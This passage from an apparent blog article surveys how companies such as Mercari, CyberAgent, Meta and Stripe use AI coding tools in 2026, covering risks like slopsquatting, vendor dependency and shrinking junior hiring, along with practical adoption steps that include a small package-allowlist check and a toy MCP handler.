&lt;td&gt;70%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Per-engineer output (year over year)&lt;/td&gt;
&lt;td&gt;+64%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AI Task Force size&lt;/td&gt;
&lt;td&gt;100+ (40 of them full-time engineers)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Workflows targeted for AI-Native conversion&lt;/td&gt;
&lt;td&gt;~4,000&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The org structure is the unusual part. The "AI Task Force" they kicked off in July 2025 is staffed across 33 domains (legal, finance, HR, and more), with engineers and PMs assigned per domain. &lt;strong&gt;Internal operations (L2) are being rebuilt by full-time engineers, one domain at a time.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The piece that's distinctly Mercari is &lt;strong&gt;Agent-Spec Driven Development (ASDD)&lt;/strong&gt;, published in December 2025. Three points:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Specification format gets standardized first&lt;/strong&gt; so AI agents have the right context&lt;/li&gt;
&lt;li&gt;With the right prompt and spec, less-experienced engineers can drive the agents&lt;/li&gt;
&lt;li&gt;Specialist tacit knowledge gets externalized into something the agents can read&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;It's not "make coding faster." It's &lt;strong&gt;rewriting the way design and specs are written so that agents can drive them&lt;/strong&gt;, which is the L1-through-L4 move.&lt;/p&gt;

&lt;h3&gt;
  
  
  6.2 CyberAgent: in-house Japanese LLM and the AI Operations Office
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Layer focus: &lt;strong&gt;L2 and L3&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;CyberAgent is unusual for being in on LLM development itself.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;May 2023&lt;/strong&gt;: built a Japanese-language LLM (13B parameters), then released a 6.8B commercially-licensable version&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;October 2023&lt;/strong&gt;: stood up an "AI Operations Office"&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;2026 target&lt;/strong&gt;: cut existing operations volume by &lt;strong&gt;roughly 60%&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;All-employee reskilling&lt;/strong&gt;: ~6,200 staff went through "Generative AI Comprehensive Understanding" reskilling&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The most successful business application has been bolting LLMs onto an existing AI product: their ad-effectiveness prediction system "Kyoku-Yosoku AI" got an LLM upgrade for accuracy. &lt;strong&gt;It wasn't "use LLMs from scratch." It was "use LLMs to extend an existing AI asset"&lt;/strong&gt;, which is generally the realistic order.&lt;/p&gt;




&lt;h2&gt;
  
  
  7. The whole map: 11 companies plotted on the four layers
&lt;/h2&gt;

&lt;p&gt;Pulling back: &lt;strong&gt;L1 AI-generated-code share has settled into 50–75% as the new floor&lt;/strong&gt;. L2 is producing real numbers in the thousands-of-person-years range. L3 is moving from "augment" to "replace": existing product features are being rebuilt on LLMs. L4 is still rare (Shopify, Meta, Mercari) but spreading.&lt;/p&gt;

&lt;p&gt;One more cross-cutting fact that's worth saying out loud: &lt;strong&gt;the companies actually getting results from coding AI are using Claude&lt;/strong&gt;. Anthropic obviously, Meta's DevMate is Claude-based, Google itself has multiple reports of internal Claude Code use, and Alphabet is putting up to $40B into Anthropic. Reaching for Cursor or Claude Code in May 2026 isn't just a tooling preference. It's also the rational model choice.&lt;/p&gt;




&lt;h2&gt;
  
  
  8. The catches: four problems every company in this article is sitting on
&lt;/h2&gt;

&lt;p&gt;So far I've been describing the side that's pushing forward. If you push this hard and this fast, the side effects show up. Four of them are already visible in May 2026.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdmvvf6vnufafwrjgq366.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdmvvf6vnufafwrjgq366.png" alt="4 problem" width="800" height="413"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  8.1 Security flaws in AI-generated code, and "slopsquatting"
&lt;/h3&gt;

&lt;p&gt;Security was the first thing to break the surface. The 2026 numbers across various security reports:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Number&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;AI-generated codebases with at least one critical vuln&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;92%&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gartner: AI-generated code with some kind of vuln&lt;/td&gt;
&lt;td&gt;48%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Rate at which LLMs recommend nonexistent packages&lt;/td&gt;
&lt;td&gt;~20%&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;A new attack surface that came with all this: &lt;strong&gt;slopsquatting&lt;/strong&gt;. The LLM tells you to &lt;code&gt;npm install&lt;/code&gt; some library, but &lt;strong&gt;the package doesn't exist&lt;/strong&gt;. Attackers register the hallucinated name in the real registry first. The agent then installs it without a second thought.&lt;/p&gt;

&lt;p&gt;A real example: in January 2026, Aikido Security researcher Charlie Eriksen registered an LLM-hallucinated npm package named &lt;code&gt;react-codeshift&lt;/code&gt; (for research). It propagated into &lt;strong&gt;237 GitHub repositories&lt;/strong&gt;. CSO Online has also called out the practice of copy-pasting MCP server configs from READMEs as a new attack vector ("MCP tool poisoning").&lt;/p&gt;
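&lt;p&gt;The slopsquatting loop is cheap to guard against at the agent boundary. A minimal sketch (the parsing and the allowlist idea are illustrative assumptions, not any vendor's API): scan agent output for &lt;code&gt;npm install&lt;/code&gt; commands and flag any package name your team hasn't vetted.&lt;/p&gt;

```python
import re

# Naive extraction of package names from `npm install ...` commands in
# free-form agent output. Illustrative only: real tooling would parse the
# command line properly and handle flags, scopes, and version specifiers.
NPM_INSTALL = re.compile(r"npm install\s+((?:[@\w./-]+\s*)+)")

def extract_npm_packages(text):
    """Return every package name that appears after `npm install`."""
    pkgs = []
    for match in NPM_INSTALL.finditer(text):
        pkgs.extend(match.group(1).split())
    return pkgs

def flag_unvetted(packages, allowlist):
    """Return the packages that are not on the team's vetted allowlist."""
    return [p for p in packages if p not in allowlist]
```

&lt;p&gt;Even a gate this crude forces a human look at any never-before-vetted name, which is exactly where hallucinated packages live.&lt;/p&gt;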

&lt;h3&gt;
  
  
  8.2 When the model vendor breaks, prod breaks
&lt;/h3&gt;

&lt;p&gt;Anthropic's postmortem on April 23, 2026 (&lt;code&gt;anthropic.com/engineering/april-23-postmortem&lt;/code&gt;) was a big talking point among teams that depend on Claude Code in production:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Three bugs overlapped, and Claude Code quality degraded for ~6 weeks&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;Cause 1: reasoning effort silently downgraded from high to medium (Mar 4 to Apr 7)&lt;/li&gt;
&lt;li&gt;Cause 2: a caching bug in chain-of-thought pruning (Mar 26 to Apr 10)&lt;/li&gt;
&lt;li&gt;Cause 3: a system-prompt change to reduce verbosity (Apr 16 to Apr 20)&lt;/li&gt;
&lt;li&gt;Result: power users canceled subscriptions, and security folks publicly warned about "dangerously degraded code quality"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If your org has gone "most of our code is written by Claude Code," you've also signed up for "&lt;strong&gt;a vendor-side internal tweak can drag our quality down for six weeks&lt;/strong&gt;." Internal AI breaking and internal dev grinding to a halt is no longer hypothetical in 2026. Anthropic reset usage limits after the incident and signed a SpaceX compute-capacity deal to absorb demand, but the structural vendor dependency stays.&lt;/p&gt;

&lt;h3&gt;
  
  
  8.3 The collapse of the junior hiring pipeline
&lt;/h3&gt;

&lt;p&gt;This is industry-wide, not specific to one company. Once "prove AI can't do it before hiring" (Shopify's memo) gets copied around, &lt;strong&gt;junior listings dry up&lt;/strong&gt;.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Number&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Entry-level hiring at top 15 tech firms (2023→2024)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;-25%&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;US junior engineer postings (since early 2024)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;~-67%&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;UK entry-level tech postings (2024)&lt;/td&gt;
&lt;td&gt;-46%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Employment for ages 22-25 in AI-exposed roles&lt;/td&gt;
&lt;td&gt;-6%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Employment for ages 35-49 in the same roles&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;+9%&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The structural problem is the obvious one: &lt;strong&gt;senior engineers were once junior engineers&lt;/strong&gt;. The pipeline that turns fresh hires into engineers with 5-10 years of experience is being shut off right now. Stack Overflow's December 2025 "AI vs Gen Z" piece raised the same alarm directly. "Cut the work AI can do" sounds rational on its own, but the same logic produces a senior shortage in 3 to 5 years.&lt;/p&gt;

&lt;h3&gt;
  
  
  8.4 Side effects of "AI usage as a quota"
&lt;/h3&gt;

&lt;p&gt;Meta is the canonical case. "65% of Creation Org engineers should write 75%+ of their code via AI" is &lt;strong&gt;functionally a quota at the floor level&lt;/strong&gt;, even if it's framed otherwise. The same period Meta has been pushing layoffs of up to 15,000 (~20% of headcount), with reports of a Reality Labs unit (~1,000 people) restructured into new roles ("AI Builder," "AI Pod Lead," "AI Org Lead").&lt;/p&gt;

&lt;p&gt;Metric distortion is the failure mode here. If you optimize "amount of AI used," people &lt;strong&gt;route work through AI even when it doesn't help&lt;/strong&gt;, just to hit the target. The thing you actually wanted to measure was "AI improved quality or speed," and that's a much harder number. Meta's PR position is that the framing is outcome-based, but the field-level risk of it being run as a literal quota gets flagged consistently.&lt;/p&gt;

&lt;h3&gt;
  
  
  8.5 Each company's specific pain, in one line
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Company&lt;/th&gt;
&lt;th&gt;Headline number&lt;/th&gt;
&lt;th&gt;What's going wrong underneath&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Google&lt;/td&gt;
&lt;td&gt;75% AI-gen code&lt;/td&gt;
&lt;td&gt;Two-tier (official Gemini, internal Claude) needs to resolve somehow&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft / GitHub&lt;/td&gt;
&lt;td&gt;Coding Agent&lt;/td&gt;
&lt;td&gt;Token-based billing in June 2026 is unpopular and hard to budget for&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Meta&lt;/td&gt;
&lt;td&gt;DevMate 50% PRs&lt;/td&gt;
&lt;td&gt;AI-usage targets are paired with massive layoffs, so the field reads it as a quota&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Amazon&lt;/td&gt;
&lt;td&gt;4,500 person-yrs&lt;/td&gt;
&lt;td&gt;Q Developer signups stop May 15 2026, migration cost to Kiro for everyone (internal/external)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Anthropic&lt;/td&gt;
&lt;td&gt;Most code by Claude&lt;/td&gt;
&lt;td&gt;The 6-week quality regression in Apr 2026, demand consistently outrunning compute&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Stripe&lt;/td&gt;
&lt;td&gt;1,300 PRs/week&lt;/td&gt;
&lt;td&gt;Slopsquatting and quality bugs scale with PR throughput&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Salesforce&lt;/td&gt;
&lt;td&gt;$100M saved&lt;/td&gt;
&lt;td&gt;Tier 1/2 automation shrinks the human-operator career path&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Shopify&lt;/td&gt;
&lt;td&gt;Reflexive AI usage&lt;/td&gt;
&lt;td&gt;"Prove AI can't" closes the entry door for juniors&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Netflix&lt;/td&gt;
&lt;td&gt;Pipeline -70%&lt;/td&gt;
&lt;td&gt;The conversational UI shift may change how serendipitous discovery actually works&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mercari&lt;/td&gt;
&lt;td&gt;95% AI usage&lt;/td&gt;
&lt;td&gt;ASDD has to actually become the org-wide standard, plus 100-person Task Force overhead&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CyberAgent&lt;/td&gt;
&lt;td&gt;60% workload cut&lt;/td&gt;
&lt;td&gt;In-house LLM upkeep cost; if the gap to foreign frontier models widens, what's plan B?&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Behind every flashy number, a specific liability is accumulating. "Just bet everything on AI" is piling up other kinds of debt (junior pipeline, vendor lock-in, metric games), and you can see it in each company.&lt;/p&gt;

&lt;h3&gt;
  
  
  8.6 Output numbers are huge, outcome numbers aren't, people still get cut
&lt;/h3&gt;

&lt;p&gt;This is the part that doesn't add up.&lt;/p&gt;

&lt;p&gt;The flashy numbers from the 11 companies above are almost all on the &lt;strong&gt;output side&lt;/strong&gt;: code generated, PRs filed, costs cut, usage rates. On the &lt;strong&gt;outcome side&lt;/strong&gt; (revenue, market share, user satisfaction), it's much harder to point at a "the world has clearly shifted" example as of May 2026.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Company&lt;/th&gt;
&lt;th&gt;Output (the loud number)&lt;/th&gt;
&lt;th&gt;Outcome (any clear, AI-attributable shift in business?)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Google&lt;/td&gt;
&lt;td&gt;75% AI-gen code&lt;/td&gt;
&lt;td&gt;AI Overviews CTR is trending down, ad revenue flat, antitrust suits ongoing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Meta&lt;/td&gt;
&lt;td&gt;DevMate 50% PRs&lt;/td&gt;
&lt;td&gt;Stock pressured by AI capex worries, Reality Labs still bleeding&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft&lt;/td&gt;
&lt;td&gt;Copilot Coding Agent&lt;/td&gt;
&lt;td&gt;Azure depends on OpenAI, Copilot revenue swinging on the billing-model change&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Amazon&lt;/td&gt;
&lt;td&gt;4,500 person-years saved&lt;/td&gt;
&lt;td&gt;Q Developer is being shrunk and rolled into Kiro; product strategy keeps shifting&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Stripe&lt;/td&gt;
&lt;td&gt;1,300 PRs/week&lt;/td&gt;
&lt;td&gt;IPO timing pushed back, no public number on revenue effect&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Salesforce&lt;/td&gt;
&lt;td&gt;$100M saved&lt;/td&gt;
&lt;td&gt;ARR growth has slowed; the stock moved on Agentforce expectations, not yet results&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mercari&lt;/td&gt;
&lt;td&gt;95% adoption, +64% output&lt;/td&gt;
&lt;td&gt;GMV growth and margin haven't shown the same kind of step change&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The only places I can point at as "actually transformed" are the &lt;strong&gt;companies selling AI tools&lt;/strong&gt;. Cursor went from a few hundred million ARR to roughly $2B in a single year. Anthropic's revenue is on a similar curve. &lt;strong&gt;Companies deploying AI inside their business&lt;/strong&gt; can't yet point at anything that obvious.&lt;/p&gt;

&lt;h4&gt;
  
  
  And yet the layoffs are at a scale we haven't seen before
&lt;/h4&gt;

&lt;p&gt;That's the strange part. Outcomes aren't in, but headcount cuts are accelerating: Meta up to 15,000 (~20%), Microsoft 9,000 in 2025 alone, and rolling rounds at Salesforce, Amazon, and Google.&lt;/p&gt;

&lt;p&gt;I don't think there's one reason. Four motives are running simultaneously:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Motive&lt;/th&gt;
&lt;th&gt;What it actually means&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;(1) Offsetting AI capex&lt;/td&gt;
&lt;td&gt;Meta alone has $135B-scale AI capex plans. GPU/TPU power bills rival headcount cost. Something has to give&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;(2) Catch-up on prior overhiring&lt;/td&gt;
&lt;td&gt;The zero-interest-period headcount boom of 2022-2023 (Meta added tens of thousands in 2022) is now being unwound under an AI banner&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;(3) Efficiency narrative for shareholders&lt;/td&gt;
&lt;td&gt;With capex this loud, you need a parallel story of "we're cutting costs" to keep investors comfortable&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;(4) A bet on three years out&lt;/td&gt;
&lt;td&gt;"When AI actually pays off, we don't want to be sitting on a high-cost org," so you cut now without waiting for outcomes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;There's also the historical pattern. When productivity spikes, demand usually expands and &lt;strong&gt;employers end up needing more workers, not fewer&lt;/strong&gt; (steam engines, PCs, spreadsheets). That's the Jevons paradox. If AI plays out the same way, generating 3x more code should make reviewers and architects the bottleneck, not surplus headcount. The current corporate moves either ignore that paradox or are betting on getting ahead of it.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flw4f22zmgm4501j0svmf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flw4f22zmgm4501j0svmf.png" alt="output" width="800" height="148"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;That loop has been spinning since 2025. The "business outcome" box on the right, though, is one nobody can fill in yet (which company, what number, when). When you're reading the loud numbers in this article, keep in mind they're all &lt;strong&gt;output&lt;/strong&gt; numbers. The outcome numbers haven't caught up.&lt;/p&gt;




&lt;h2&gt;
  
  
  9. What you can actually do at your shop
&lt;/h2&gt;

&lt;p&gt;By the time you get here, the natural question is: "ok, what do I do tomorrow?" Here's what I'd do, ordered by entry difficulty.&lt;/p&gt;

&lt;p&gt;The 2026 baseline assumption is: &lt;strong&gt;using Cursor / Claude Code / Copilot daily doesn't count as "pushing forward" anymore&lt;/strong&gt;. You need a step past that.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Time horizon&lt;/th&gt;
&lt;th&gt;What to do&lt;/th&gt;
&lt;th&gt;Difficulty&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;This week&lt;/td&gt;
&lt;td&gt;Hook one internal tool (Slack / Jira / wiki / DB) up over MCP. Refresh &lt;code&gt;CLAUDE.md&lt;/code&gt; / &lt;code&gt;AGENTS.md&lt;/code&gt;. Try Auto Mode / subagents in parallel&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;This quarter&lt;/td&gt;
&lt;td&gt;Stand up one production line where Copilot Coding Agent or Claude Code takes Issues and ships PRs. Ship one RAG-based internal search to production&lt;/td&gt;
&lt;td&gt;Mid&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6 months to 1 year&lt;/td&gt;
&lt;td&gt;Rewrite specs for agents (Mercari-style ASDD). Ship one L2 cost-saving number (a routine report, test backfill, etc.)&lt;/td&gt;
&lt;td&gt;Mid-high&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Needs leadership decision&lt;/td&gt;
&lt;td&gt;Wire AI usage into evaluations (Shopify-style). Stand up an AI Task Force-equivalent&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;In plain terms:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Push L1 past where it's stuck&lt;/strong&gt;. Don't stop at "I use Cursor." This week: hook one internal tool over MCP, run subagents in parallel, kick the tires on Auto Mode. None of these need special permission and they're standard 2026 work&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Produce one L2 cost number&lt;/strong&gt;. Amazon's 4,500 person-years and Mercari's 4,000 workflows started from one item. "I agentized this routine report and it freed up 10 hours a week" reframes the conversation in your team&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Find one customer-facing thing to redo at L3&lt;/strong&gt;. Existing support, search, recommendations, form filling. Somewhere there's a place where "swap in an LLM" actually changes the experience. Salesforce's $100M didn't start at $100M. It started with one Tier 1 auto-response use case&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;L4 needs leadership air cover&lt;/strong&gt;. Wiring AI use into evals is a leadership-level decision and you can't unilaterally do it as an engineer. What you can do is package the case ("Shopify and Mercari are headed here, why not us") with data and walk it upstairs&lt;/li&gt;
&lt;/ol&gt;
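&lt;p&gt;On point 1: hooking a tool up over MCP is more mechanical than it sounds. An MCP server is essentially a JSON-RPC 2.0 endpoint (usually over stdio) that answers methods like &lt;code&gt;tools/list&lt;/code&gt;. A toy sketch of that wire shape, with a hypothetical &lt;code&gt;search_wiki&lt;/code&gt; tool (not a real SDK, just the framing a real server automates for you):&lt;/p&gt;

```python
import json

# Toy illustration of the MCP wire shape: a JSON-RPC 2.0 request comes in
# as one line, a JSON-RPC 2.0 response goes out. Real servers use an MCP
# SDK over stdio; the `search_wiki` tool here is a hypothetical example.
def handle_request(line: str) -> str:
    req = json.loads(line)
    if req.get("method") == "tools/list":
        # Advertise the tools this server exposes to the agent.
        result = {"tools": [{
            "name": "search_wiki",
            "description": "Search the internal wiki (hypothetical example)",
        }]}
        return json.dumps({"jsonrpc": "2.0", "id": req.get("id"),
                           "result": result})
    # Anything we don't implement gets the standard JSON-RPC error.
    return json.dumps({"jsonrpc": "2.0", "id": req.get("id"),
                       "error": {"code": -32601, "message": "Method not found"}})
```

&lt;p&gt;Once an agent can list and call a tool like that, the "one internal tool over MCP" box is ticked; everything past it is auth and plumbing.&lt;/p&gt;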




&lt;h2&gt;
  
  
  Closing
&lt;/h2&gt;

&lt;p&gt;The era where "are you using AI?" / "yes" was a complete answer is probably ending in 2026.&lt;/p&gt;

&lt;p&gt;What ties the 11 companies in this article together is that they made &lt;strong&gt;AI use a property of the organization, not a habit of an individual&lt;/strong&gt;. Google's 75%, Stripe's 1,300 PRs a week, Mercari's 95% are not the result of individuals working harder. They're the result of organizations making weird, expensive bets ("we're going to design code review around AI authoring," "we're putting 100 people on an AI Task Force," "we're rewriting how we write specs around ASDD"). None of those just happen.&lt;/p&gt;

&lt;p&gt;The flip side: nothing in this article is reachable through "individuals trying harder." The question becomes where to plant a wedge in your org so the team can move in the same direction. I hope this article works as a catalog for that.&lt;/p&gt;

&lt;p&gt;If you can bring one small L2 number to your standup tomorrow, in addition to the usual L1 chatter, you'll change the frame of the conversation.&lt;/p&gt;




&lt;h2&gt;
  
  
  Sources (first-party where possible)
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://newsletter.pragmaticengineer.com/p/ai-tooling-2026" rel="noopener noreferrer"&gt;AI Tooling for Software Engineers in 2026 (Pragmatic Engineer survey, Feb 2026)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://blog.google/innovation-and-ai/infrastructure-and-cloud/google-cloud/cloud-next-2026-sundar-pichai/" rel="noopener noreferrer"&gt;Sundar Pichai shares news from Google Cloud Next 2026&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.businesstoday.in/technology/story/google-engineers-turn-to-anthropics-claude-code-amid-internal-challenges-526856-2026-04-22" rel="noopener noreferrer"&gt;Google engineers turn to Anthropic's Claude Code amid internal challenges (BusinessToday, Apr 2026)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://news.aibase.com/news/24207" rel="noopener noreferrer"&gt;Google chief engineer publicly praises Claude Code (Jaana Dogan post, Jan 2026)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.anthropic.com/news/google-broadcom-partnership-compute" rel="noopener noreferrer"&gt;Anthropic expands partnership with Google and Broadcom (Anthropic)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www-cdn.anthropic.com/58284b19e702b49db9302d5b6f135ad8871e7658.pdf" rel="noopener noreferrer"&gt;How Anthropic teams use Claude Code (PDF)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.infoq.com/news/2026/05/anthropic-claude-code-auto-mode/" rel="noopener noreferrer"&gt;Inside Claude Code Auto Mode (InfoQ, May 2026)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://linearb.io/blog/meta-ai-control-plane-james-everingham-guildai" rel="noopener noreferrer"&gt;Meta builds the agentic infrastructure that drives 50% of its code changes (LinearB)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.blog/news-insights/company-news/build-an-agent-into-any-app-with-the-github-copilot-sdk/" rel="noopener noreferrer"&gt;Build an agent into any app with the GitHub Copilot SDK (GitHub Blog)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/orgs/community/discussions/192948" rel="noopener noreferrer"&gt;GitHub Copilot is moving to usage-based billing (GitHub Discussions)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://aws.amazon.com/blogs/devops/april-2025-amazon-q-developer/" rel="noopener noreferrer"&gt;April 2025: A month of innovation for Amazon Q Developer (AWS)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://aws.amazon.com/blogs/devops/amazon-q-developer-end-of-support-announcement/" rel="noopener noreferrer"&gt;Amazon Q Developer end-of-support announcement (AWS)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://stripe.dev/blog/minions-stripes-one-shot-end-to-end-coding-agents-part-2" rel="noopener noreferrer"&gt;Stripe Minions: one-shot, end-to-end coding agents Part 2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cursor.com/blog/stripe" rel="noopener noreferrer"&gt;Cursor: Stripe customer story&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://x.com/tobi/status/1909251946235437514" rel="noopener noreferrer"&gt;Tobi Lütke: Reflexive AI usage at Shopify (X)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://fortune.com/2026/04/18/salesforce-agentforce-ai-efficiency-revenue-growth/" rel="noopener noreferrer"&gt;Salesforce Agentforce: Fortune coverage (Apr 2026)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://prs2025.splashthat.com/" rel="noopener noreferrer"&gt;Netflix Personalization, Recommendation and Search Workshop 2025&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://engineering.mercari.com/blog/entry/20251201-pj-double-towards-ai-native-development/" rel="noopener noreferrer"&gt;Mercari Engineering: pj-double, ASDD and the AI-Native shift&lt;/a&gt;&lt;/li&gt;
